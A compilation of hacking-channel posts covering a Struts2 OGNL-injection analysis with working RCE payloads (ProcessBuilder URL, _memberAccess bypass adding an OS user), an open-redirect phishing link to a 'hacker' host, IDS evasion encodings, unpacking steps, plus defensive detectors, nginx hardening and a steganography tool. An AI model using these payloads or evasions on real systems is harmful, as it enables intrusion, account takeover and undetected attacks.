UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑 5G Cellular Attacks:


- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)

- [Protecting the 4G and 5G Cellular Paging Protocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)

- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)

- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)

- [QCSuper - a tool for capturing 2G-4G air traffic on Qualcomm-based phones](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)

- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)

- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)

- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)

don't copy our tutorials
git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑 Struts2 security vulnerability analysis by undercode:

1) Remote execution of script code on the server

A user can construct a link of the form http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}. The 'command','goes','here' array is the path and arguments of the program to run, so it can be replaced with anything, including a destructive command (the example given is fdisk -f) that leaves the system unable to run. %25 is a URL-encoded "%", so the server sees action:%{...}, an OGNL expression that Struts evaluates because of the action: prefix.

2) Open redirect

A user can build a redirection link on a well-known site such as Taobao, for example <a href="http://www.淘宝.com/item00001.html?redirect:http://hacker/getyourPassword">discount new styles</a>, lure the victim into clicking it, and land them on a phishing page whose login form harvests their password. The redirect: prefix is evaluated by Struts in the same way as action:, so the destination is attacker-controlled.

3) Impact:
Apple, China Mobile, China Unicom, Baidu, Tencent, Taobao, JD.com, Sohu, Minsheng Bank and other large corporate websites were all hit, and their operations engineers had a miserable time.

🦑 Countermeasures:

The Apache team urgently released Struts 2.3.15.1 as a security update; upgrading to this version fixes both problems above.

Struts2 vulnerability attack methods and solutions

1) Principle
Struts2 is built on the WebWork (XWork) framework. When an action is processed, every HTTP parameter is applied to the action object through its getter/setter methods: each parameter name is treated as an OGNL expression (Object-Graph Navigation Language). So when we submit the HTTP parameters:

?user.address.city=Bishkek&user['favoriteDrink']=kumys

OGNL turns them into:

//code @Undercoder
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")

This is done by the ParametersInterceptor, which calls ValueStack.setValue() with the HTTP parameters supplied by the user.

2) To stop tampering with server-side objects, XWork's ParametersInterceptor rejects the "#" character in parameter names, since "#" introduces OGNL context variables such as #_memberAccess. But if "#" is written as the Java unicode escape \u0023, the filter does not see it while the OGNL parser still does, so the attacker can bypass the protection and change the values that control method execution:

The code here is destructive; run it only in a test environment. Using this method for malicious attacks is strictly forbidden.

//code @Undercoder
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

After the escapes are decoded it looks like this:
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

The three parameters first allow static method access, then clear the denyMethodExecution flag, and finally evaluate #rt.exit(1) with #rt bound to the Runtime. What OGNL ends up executing is:

java.lang.Runtime.getRuntime().exit(1); // terminates the JVM, i.e. shuts down the web application

🦑 In the same way one can execute
java.lang.Runtime.getRuntime().exec("net user <username> <password> /add"); // adds an operating-system user; succeeds if the application runs with sufficient privilege (in the URL, spaces are encoded as %20 and / as %2F)
As long as the process has the privilege, any OS command (here a Windows shell command) can be executed.
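Both bypasses above are encoding problems: the ParametersInterceptor filter saw \u0023 while OGNL saw "#", and the prefix payload hides %{ behind %25. The Python below is an added example, not code from this post or from Struts: it normalizes a request's query string through percent-decoding and Java unicode-escape expansion until nothing changes, then looks for the OGNL markers used in the payloads above. The request lines are constructed samples, and the marker list is an assumption (a few strings from this post, not a complete rule set; "#" on its own will also flag any literal "#" in a query).

```python
"""Spot Struts2 OGNL-injection attempts in access-log request lines.

Added example: percent-decodes and expands Java \\uXXXX escapes until the
query string stops changing, then matches the OGNL markers from the post.
"""
import re
from urllib.parse import unquote

# Java-style unicode escapes, e.g. \u0023 -> '#', \u003d -> '='.
JAVA_UNICODE_RE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Markers drawn from the payloads in the post; an assumption, not a full rule set.
OGNL_MARKERS = [
    "#",                         # OGNL context variable (the filtered character)
    "%{",                        # OGNL expression evaluation
    "action:",                   # S2-016 prefix evaluated as OGNL
    "redirect:",                 # S2-016 open-redirect prefix
    "_memberAccess",             # toggling allowStaticMethodAccess
    "@java.lang.Runtime@",       # OGNL static-call syntax
    "java.lang.ProcessBuilder",  # process spawn in the S2-016 payload
]

# Constructed sample request lines (not real log data).
SAMPLE_REQUESTS = [
    "GET /example/X.action?user.address.city=Bishkek&user%5B%27favoriteDrink%27%5D=kumys HTTP/1.1",
    "GET /struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder"
    "(new+java.lang.String[]{'command','goes','here'})).start()} HTTP/1.1",
    r"GET /example/X.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true"
    r"&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')"
    r"(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))"
    r"&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1 HTTP/1.1",
    "GET /item00001.html?redirect:http://hacker/getyourPassword HTTP/1.1",
]


def query_of(request_line: str) -> str:
    """Return the raw query string from 'METHOD /path?query HTTP/1.x' ('' if none)."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    return target.partition("?")[2]


def normalize(query: str) -> str:
    """Percent-decode and expand Java unicode escapes until nothing changes,
    so that \\u0023 and %23 both become '#' and %25{ becomes %{."""
    previous = None
    current = query
    while current != previous:
        previous = current
        current = unquote(current)
        current = JAVA_UNICODE_RE.sub(lambda m: chr(int(m.group(1), 16)), current)
    return current


def find_ognl_markers(query: str) -> list:
    """Return the OGNL markers present in the normalized query string."""
    normalized = normalize(query)
    return [marker for marker in OGNL_MARKERS if marker in normalized]


def scan_requests(lines) -> dict:
    """Map the index of each suspicious request line to the markers found in it."""
    hits = {}
    for index, line in enumerate(lines):
        markers = find_ognl_markers(query_of(line))
        if markers:
            hits[index] = markers
    return hits


if __name__ == "__main__":
    for index, markers in scan_requests(SAMPLE_REQUESTS).items():
        print(f"line {index}: {markers}")
```

The loop in normalize matters: a single decoding pass would still miss %2525{ or an escape that itself spells out another escape, which is exactly the kind of layering the ParametersInterceptor filter fell for.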

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Method to hide secrets with invisible characters in plain text, securely, using passwords 🧙🏻‍♂️⭐️

F E A T U R E S :

1) Protect your invisible secret with a password and HMAC integrity.

2) Cryptographically secure: the invisible secret is encrypted with AES-256-CTR.

3) Uses 6 invisible Unicode characters that work everywhere on the web: tweets, Gmail, WhatsApp, Telegram, Instagram, Facebook and many more.

4) Maximum compression to reduce the payload (LZ, Huffman).
Completely invisible: uses zero-width characters instead of spaces or tabs.

5) Super fast: hides the Wikipedia page source for "steganography" (800 lines, 205,362 characters) within a cover text of 3 words in under one second.

6) Files can be hidden in strings by uploading the file to the cloud and stegcloaking the link in the string.
Written in pure functional style.
Usage: available as an API module, a CLI and a web interface (optimized with web workers).

🄸🄽🅂🅃🄰🄻🄻🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/KuroLabs/stegcloak.git

2) $ npm install -g stegcloak

3) Using npm (to use it locally in your program),

$ npm install stegcloak

Hide
$ stegcloak hide

🦑 Options:

hide [options] [secret] [cover]

-fc, --fcover <file> Extract cover text from file
-fs, --fsecret <file> Extract secret text from file
-n, --nocrypt If you don't need encryption (default: false)
-i, --integrity If additional security of preventing tampering is needed (default: false)
-o, --output <output> Stream the results to an output file
-c, --config <file> Config file
-h, --help display help for command

Reveal
$ stegcloak reveal
Options:

reveal [message]

-f, --file <file> Extract message from file
-cp, --clip Copy message directly from clipboard
-o, --output <output> Stream the secret to an output file
-c, --config <file> Config file
-h, --help display help for command
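To make the feature list concrete, here is an added example in Python; it is not stegcloak's code, its wire format or its six-character alphabet. The secret is turned into zero-width characters, two bits per character, and spliced into the cover text after its first word, with an HMAC-SHA256 tag under a PBKDF2-derived key so that a wrong password or a tampered message is rejected. The four zero-width code points, the fixed salt, the PBKDF2 parameters and the omission of the AES-CTR encryption step are simplifications of this example: the hidden bytes are authenticated but not confidential.

```python
"""Hide a secret in cover text as zero-width characters, with HMAC integrity.

Added example (stdlib only); not stegcloak's code or format. The payload is
authenticated with HMAC-SHA256 but, unlike stegcloak, not encrypted.
"""
import hashlib
import hmac

# Four zero-width code points: ZWSP, ZWNJ, ZWJ, WORD JOINER. Two bits per character.
ZW_ALPHABET = "\u200b\u200c\u200d\u2060"
ZW_INDEX = {ch: i for i, ch in enumerate(ZW_ALPHABET)}
TAG_LEN = 16              # bytes of the HMAC-SHA256 tag that are kept
SALT = b"zw-stego-demo"   # fixed salt: a simplification of this example


def derive_key(password: str) -> bytes:
    """PBKDF2-HMAC-SHA256 key from the password (iteration count is an assumption)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), SALT, 100_000)


def bytes_to_zw(data: bytes) -> str:
    """Encode each byte as four zero-width characters, most significant pair first."""
    return "".join(ZW_ALPHABET[(b >> shift) & 0b11] for b in data for shift in (6, 4, 2, 0))


def zw_to_bytes(zw: str) -> bytes:
    """Inverse of bytes_to_zw; rejects a truncated payload."""
    if len(zw) % 4:
        raise ValueError("truncated zero-width payload")
    out = bytearray()
    for i in range(0, len(zw), 4):
        value = 0
        for ch in zw[i:i + 4]:
            value = (value << 2) | ZW_INDEX[ch]
        out.append(value)
    return bytes(out)


def hide(secret: str, cover: str, password: str) -> str:
    """Return cover with tag||secret spliced in as zero-width characters after the first word."""
    payload = secret.encode("utf-8")
    tag = hmac.new(derive_key(password), payload, hashlib.sha256).digest()[:TAG_LEN]
    cut = cover.find(" ")
    if cut < 0:
        raise ValueError("cover text needs at least two words")
    return cover[:cut] + bytes_to_zw(tag + payload) + cover[cut:]


def reveal(stego: str, password: str) -> str:
    """Extract the zero-width characters, verify the tag, and return the secret."""
    zw = "".join(ch for ch in stego if ch in ZW_INDEX)
    if not zw:
        raise ValueError("no hidden payload in this text")
    blob = zw_to_bytes(zw)
    tag, payload = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(derive_key(password), payload, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed: wrong password or tampered message")
    return payload.decode("utf-8")


def visible_text(stego: str) -> str:
    """What a reader sees: the text with the zero-width characters removed."""
    return "".join(ch for ch in stego if ch not in ZW_INDEX)


if __name__ == "__main__":
    # Constructed sample inputs.
    hidden = hide("meet at the usual place, 21:00", "This is a normal looking sentence.", "hunter2")
    print(repr(hidden))
    print(reveal(hidden, "hunter2"))
```

Note what the tag does and does not give you: it stops a recipient from being fed a forged or bit-flipped secret, but anyone who strips zero-width characters (or pastes the text through a normalizer that drops them) destroys the payload, and anyone who extracts them can read it, which is why the real tool encrypts first.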


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

๐Ÿฆ‘๐ŸŒSome Nginx security configuration tips by undercode:

1) Basic security setup
The best way to protect your web server is to give an attacker as little information as possible: the version numbers of Nginx, PHP, the OS, and so on.

Typically this information leaks through HTTP headers.

# Only return "nginx" in the Server header (and on error pages), without the version
server_tokens off;

Testing
# Display the Server header (curl -v writes headers to stderr, hence the redirection)
curl https://mywebserver.domain.net/ -ksv 2>&1 >/dev/null | grep Server


2) Strict Transport Security (HSTS)
This header tells the HTTP client that your site must only ever be reached over HTTPS: for max-age seconds the browser rewrites http:// links to https:// by itself and refuses to click through certificate errors.

The HSTS policy protects users from eavesdropping and downgrade attacks.

A man-in-the-middle cannot force the request back to plain HTTP while the policy is active. Note that the browser only learns the policy on its first HTTPS visit (or from the preload list), so that first visit is still exposed.

add_header Strict-Transport-Security "max-age=15552001; includeSubDomains; preload";

Send this header only from the HTTPS server block. Add preload only once you intend to submit the domain to the browser preload list, which requires a max-age of at least one year (31536000), and remember that add_header directives are not inherited by a location block that sets its own add_header.

3) Other means of protection
# Do not send ETag headers (they expose file metadata: nginx builds them from the last-modified time and size)

etag off;
more_clear_headers 'ETag';

(etag off needs nginx 1.3.3 or later; more_clear_headers comes from the third-party headers-more module and is only needed to strip an ETag set by an upstream.)

🦑 Anti-clickjacking:

add_header X-Frame-Options "SAMEORIGIN";

(Modern browsers also honour the Content-Security-Policy frame-ancestors directive, which supersedes X-Frame-Options; send both.)

1) SSL and TLS encryption protocols
When we say SSL we actually mean SSL/TLS.

You should be aware that SSL has been deprecated since 1999, when TLS 1.0 replaced it, and that its last version, SSLv3, dates from 1996.

Since then TLS has taken over; the versions considered here are TLSv1.0, TLSv1.1 and TLSv1.2 (TLSv1.3 has since been standardized, and TLSv1.0 and TLSv1.1 are now themselves deprecated).

On October 14, 2014 Google published the POODLE attack, which lets an attacker decrypt parts of an SSLv3 session, enough to recover a session cookie.

Since about two thirds of the web servers on the Internet still accepted this protocol, the community panicked.

Admittedly, the exploit is not easy: the attacker has to sit in the middle and force the client to fall back to SSLv3, which browsers of the time did automatically when a newer handshake failed. The same downgrade logic applies to cipher-suite attacks such as Logjam, which targets the export-grade DH suites listed under "Encryption algorithms" below, so the problem is not limited to SSLv3 itself.

The best way to protect yourself is to disable SSLv3 (and, today, TLSv1 and TLSv1.1 as well if your clients allow it):

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

Testing the configuration (the handshake must fail; recent OpenSSL builds no longer even compile in -ssl3)
echo -n | openssl s_client -connect mywebserver.domain.net:443 -ssl3


2) Encryption algorithms
A cipher suite combines four kinds of algorithm:

- Key exchange
- Authentication
- Bulk (symmetric) encryption
- Message authentication (MAC)

Some algorithms (RC4, export-grade or small-group DH, 3DES, EXPORT suites, MD5, etc.) should be avoided and others given priority. Add ssl_prefer_server_ciphers on; so that the server's order, not the client's, decides, and note that with OpenSSL the ssl_ciphers directive does not govern TLSv1.3 suites.
# Best ratio security / compatibility
ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA;

# Secure
ssl_ciphers EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH;

# Global
ssl_ciphers EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:ECDHE-RSA-AES128-SHA:DHE-RSA-
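The checks above are easy to let slip when a server block is edited by hand, so here is an added example in Python (not from this post and not an nginx tool) that lints a server block for the points discussed: server_tokens, legacy protocols, weak cipher families, server cipher preference, HSTS with a preload-compatible max-age, and X-Frame-Options. The two configurations are constructed samples, a weak one and the hardened version; the hardened one uses a one-year max-age and TLSv1.2/1.3 rather than the values shown above. The parser only understands simple "name value;" lines, which is all a lint of these directives needs.

```python
"""Lint an nginx server block for the hardening points discussed above.

Added example; not an nginx tool. Handles only simple 'name value;' lines.
"""
import re

# Constructed sample: a server block with the weak defaults.
WEAK_CONF = """
server {
    listen 443 ssl;
    server_name mywebserver.domain.net;
    server_tokens on;
    ssl_protocols SSLv3 TLSv1 TLSv1.1 TLSv1.2;
    ssl_ciphers HIGH:!aNULL:RC4:MD5;
}
"""

# Constructed sample: the same block after hardening (one-year HSTS for preload).
HARDENED_CONF = """
server {
    listen 443 ssl;
    server_name mywebserver.domain.net;
    server_tokens off;
    etag off;
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH;
    ssl_prefer_server_ciphers on;
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload";
    add_header X-Frame-Options "SAMEORIGIN";
}
"""

DIRECTIVE_RE = re.compile(r"^\s*([a-z_]+)\s+(.*?)\s*;\s*$", re.MULTILINE)
LEGACY_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1", "TLSv1.1"}
WEAK_CIPHER_RE = re.compile(r"RC4|MD5|DES|EXP|NULL|PSK|KRB5", re.IGNORECASE)
ONE_YEAR = 31536000


def parse_directives(conf: str):
    """Return (name, arguments) for each 'name arguments;' line; block openers are skipped."""
    return DIRECTIVE_RE.findall(conf)


def lint(conf: str) -> list:
    """Return a list of findings; an empty list means every check passed."""
    values, headers = {}, {}
    for name, args in parse_directives(conf):
        if name == "add_header":
            header, _, value = args.partition(" ")
            headers[header.lower()] = value.strip().strip('"')
        else:
            values[name] = args
    findings = []
    if values.get("server_tokens") != "off":
        findings.append("server_tokens is not off: the nginx version is sent in Server and error pages")
    for proto in values.get("ssl_protocols", "").split():
        if proto in LEGACY_PROTOCOLS:
            findings.append(f"ssl_protocols enables deprecated {proto}")
    for suite in values.get("ssl_ciphers", "").split(":"):
        # A leading '!' removes the family from the list, so only unnegated entries count.
        if not suite.startswith("!") and WEAK_CIPHER_RE.search(suite):
            findings.append(f"ssl_ciphers allows weak suite or family {suite}")
    if "ssl_ciphers" in values and values.get("ssl_prefer_server_ciphers") != "on":
        findings.append("ssl_prefer_server_ciphers is not on: the client picks the suite order")
    hsts = headers.get("strict-transport-security")
    if hsts is None:
        findings.append("no Strict-Transport-Security header")
    else:
        match = re.search(r"max-age=(\d+)", hsts)
        max_age = int(match.group(1)) if match else 0
        if "preload" in hsts and max_age < ONE_YEAR:
            findings.append(f"HSTS preload requested but max-age={max_age} is below one year ({ONE_YEAR})")
    if "x-frame-options" not in headers:
        findings.append("no X-Frame-Options header: the site can be framed (clickjacking)")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: {len(lint(conf))} finding(s)")
        for finding in lint(conf):
            print("  -", finding)
```

Run it against the file you are about to deploy rather than against the live server: a static check like this catches the configuration before it is served, and it complements, not replaces, the curl and openssl tests above that verify what the server actually sends.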


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How do I stop Google Chrome from restoring tabs?
#forBeginners

» Method of stopping Google Chrome from restoring tabs:
To stop Google Chrome from restoring tabs, perform the following steps:

1) Launch Google Chrome by double-clicking its shortcut icon on your desktop.

2) Click the three dots in the top right corner of the Google Chrome window.

3) As soon as you click this icon, a drop-down menu appears. Select Settings from this menu.

4) On the Google Chrome Settings page, scroll down to the "On start-up" section and select the "Open the New Tab page" radio button; Chrome will then no longer restore the previous session's tabs.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Example tricks for getting past an IDS (intrusion detection system):

1) Trick: use the path separator "\"

On web servers like Microsoft IIS, "\" is accepted as a path separator just like "/". Some IDS rule sets were written without considering the non-standard separator "\". If we rewrite /msadc/msadcs.dll as \msadc\msadcs.dll we slip past Snort, because the Snort rule set contains no signature for \msadc\msadcs.dll. Worth mentioning: the "\" separator has another use too, the "%5c" database-exposure (暴库) trick described in "Hacker Defense" a while ago; "%5c" is the URL-encoded hexadecimal form of "\".

2) Trick: hexadecimal (percent) encoding

Any character can be written as the escape symbol "%" followed by its ASCII code in hexadecimal. For example, the leading "/" in /msadc/msadcs.dll can be written %2F, and every following character can likewise be written as "%" plus its hexadecimal ASCII code. A URL encoded this way no longer looks like the original, and the encoded string may not appear in the IDS rule set, so the IDS can be bypassed. This method fails against an IDS with an HTTP preprocessor, which decodes the URL before matching.

3) Trick: illegal (overlong) Unicode encoding

UTF-8 allows a character set of more than 256 characters, so it also allows encodings longer than 8 bits. The hexadecimal ASCII code of "/" is 2F, binary 00101111. The standard UTF-8 representation of 2F is still the single byte 2F, but multi-byte UTF-8 sequences can also be made to decode to 2F. "/" can be written in one, two or three bytes as in the following table:

"/" character      bit pattern                     binary                         hex
Single byte        0xxxxxxx                        00101111                       2F
Double byte        110xxxxx 10xxxxxx               11000000 10101111              C0 AF
Three bytes        1110xxxx 10xxxxxx 10xxxxxx      11100000 10000000 10101111     E0 80 AF

The two- and three-byte forms are "overlong": a conforming UTF-8 decoder must reject them, but some servers, IIS among them, historically accepted them. We can encode the whole string this way; the encoded URLs all point to the same resource but are written differently, and the filter string may not exist in the IDS rule set, so the IDS is defeated.
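All three tricks work only against a matcher that compares the raw URL; an HTTP-aware IDS preprocessor normalizes first. The Python below is an added example, not Snort's normalizer: it percent-decodes, decodes UTF-8 while deliberately accepting (and reporting) the overlong two- and three-byte forms from the table, turns backslashes into slashes, resolves "." and ".." segments, and then compares the result with the signature. The request targets are constructed samples, and the decoder leaves four-byte sequences out of scope.

```python
"""Canonicalize request paths before signature matching, as an HTTP preprocessor must.

Added example, not Snort's normalizer: shows why the backslash, percent-encoding
and overlong-UTF-8 tricks defeat a raw substring match but not a normalized one.
"""
import re

PCT_RE = re.compile(r"%([0-9A-Fa-f]{2})")
SIGNATURE = "/msadc/msadcs.dll"

# Constructed request targets: the same resource spelled six ways.
SAMPLE_TARGETS = [
    "/msadc/msadcs.dll",
    "\\msadc\\msadcs.dll",                  # backslash separators (IIS)
    "%2Fmsadc%2Fmsadcs.dll",               # percent-encoded '/'
    "%C0%AFmsadc%C0%AFmsadcs.dll",         # overlong 2-byte UTF-8 '/'
    "%E0%80%AFmsadc%E0%80%AFmsadcs.dll",   # overlong 3-byte UTF-8 '/'
    "/msadc/./tmp/../msadcs.dll",          # dot segments
]


def percent_decode(target: str):
    """Turn %XX escapes into bytes; other characters pass through as UTF-8."""
    out, i, seen = bytearray(), 0, False
    while i < len(target):
        m = PCT_RE.match(target, i)
        if m:
            out.append(int(m.group(1), 16))
            i += 3
            seen = True
        else:
            out.extend(target[i].encode("utf-8"))
            i += 1
    return bytes(out), seen


def _is_continuation(data: bytes, j: int) -> bool:
    return j < len(data) and 0x80 <= data[j] <= 0xBF


def decode_utf8_lenient(data: bytes):
    """Decode UTF-8 the permissive way a vulnerable server did: overlong 2- and
    3-byte forms are accepted and reported. 4-byte forms are out of scope here."""
    out, evasions, i = [], [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and _is_continuation(data, i + 1):
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if cp < 0x80:  # fits in one byte, so this encoding is overlong
                evasions.append(f"overlong 2-byte UTF-8 for {chr(cp)!r}")
            out.append(chr(cp))
            i += 2
        elif 0xE0 <= b <= 0xEF and _is_continuation(data, i + 1) and _is_continuation(data, i + 2):
            cp = ((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)
            if cp < 0x800:  # fits in two bytes or fewer, so overlong
                evasions.append(f"overlong 3-byte UTF-8 for {chr(cp)!r}")
            out.append(chr(cp))
            i += 3
        else:
            out.append("\ufffd")
            evasions.append(f"invalid byte 0x{b:02x}")
            i += 1
    return "".join(out), evasions


def canonicalize(target: str):
    """Return (canonical path, list of evasion techniques observed)."""
    evasions = []
    raw, had_percent = percent_decode(target)
    if had_percent:
        evasions.append("percent-encoding")
    text, utf8_evasions = decode_utf8_lenient(raw)
    evasions.extend(utf8_evasions)
    if "\\" in text:
        evasions.append("backslash path separator")
        text = text.replace("\\", "/")
    parts = []
    for segment in text.split("/"):
        if segment in (".", ".."):
            if "dot segments" not in evasions:
                evasions.append("dot segments")
            if segment == ".." and parts:
                parts.pop()
        elif segment:
            parts.append(segment)
    return "/" + "/".join(parts), evasions


def naive_match(target: str) -> bool:
    """What a rule that compares the raw URL sees."""
    return SIGNATURE in target


def canonical_match(target: str) -> bool:
    """What a rule applied after normalization sees."""
    return SIGNATURE in canonicalize(target)[0]


if __name__ == "__main__":
    for target in SAMPLE_TARGETS:
        path, evasions = canonicalize(target)
        print(f"{target!r:40} naive={naive_match(target)!s:5} canonical={canonical_match(target)!s:5} {path} {evasions}")
```

The evasion list is as useful as the match itself: an overlong sequence or a backslash separator has no legitimate reason to appear in a request, so a preprocessor can alert on the encoding alone even when the decoded path matches no signature.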

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Commonly used unpacking method
#Cracking

A) Single-step tracing method

1) Load the program in OllyDbg (OD) and click "Do not analyze code".

2) Single-step downward with F8 (step over) and let only downward jumps be taken; upward jumps must not be taken, which you enforce with F4 (run to the selected line).

3) When the program would jump back (including loops), put the cursor on the line after the jump and press F4 (or right-click the code and choose Breakpoint -> Run to selection).

4) A green arrow means the jump will not be taken; ignore it. A red arrow means the jump will be taken.

5) If there is a CALL right after the program has been loaded, follow it with F7 (step into); otherwise the program easily runs away. This is how you reach the program's OEP (original entry point) quickly.

6) While tracing, if stepping over a certain CALL makes the program run to completion, step into that CALL with F7 instead.

7) In general a large jump (a big span), such as jmp XXXXXX, JE XXXXXX or RETN, usually leads to the program's OEP soon after.
Note: When some packers cannot be traced down this way, find a nearby big jump that has not been taken, right-click -> "Follow", press F2 to set a breakpoint there, then Shift+F9 (run, passing exceptions to the program) to stop at the "Follow" position; remove the breakpoint and continue single-stepping with F8. Under normal circumstances you reach the OEP easily.


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from WEB UNDERCODE - PRIVATE
SMTP Log Poisoning.pdf
In this PDF we discuss SMTP log poisoning. Before getting into the details, read our previous articles "SMTP Lab Set-Up" and "Beginner Guide to File Inclusion Attack (LFI/RFI)". Today you will see how a web server can be exploited by abusing its SMTP service when the web server is vulnerable to local file inclusion: the attacker mails PHP code to the server so that it lands in the mail log, then includes that log file through the LFI.
#Practical
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Track mobile data consumption on iPhone and Android:

1) Tracking data consumption on iPhone
When you insert a SIM card or activate an eSIM, the iPhone receives data from the carrier, including the tariff plan, billing cycle and current data consumption. Since this is carrier information, you cannot track it completely independently, but you can watch consumption grow and catch suspicious spikes.

2) In the "Cellular" (Mobile Data) section of Settings you can see the data consumption. Scroll down to the per-app list and turn off the switch for any app that should not spend mobile data; it will then only reach the Internet over Wi-Fi. This is fine if your mobile data allowance is no more than about 5 GB.

3) If you are gradually approaching the limit, it is better to turn on Low Data Mode to avoid exceeding it. To do this, open Cellular Data Options in the same menu. Once enabled, apps will not use mobile data unless you are actively working with them: video streaming quality is reduced, automatic background synchronization is disabled, and services like Photos stop updating.

4) The system has no built-in way to alert you when the data limit is approaching. This can be done with third-party apps, for example the carrier's own app. Without third-party apps, you can only periodically check the consumption in the "Cellular" section of Settings.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁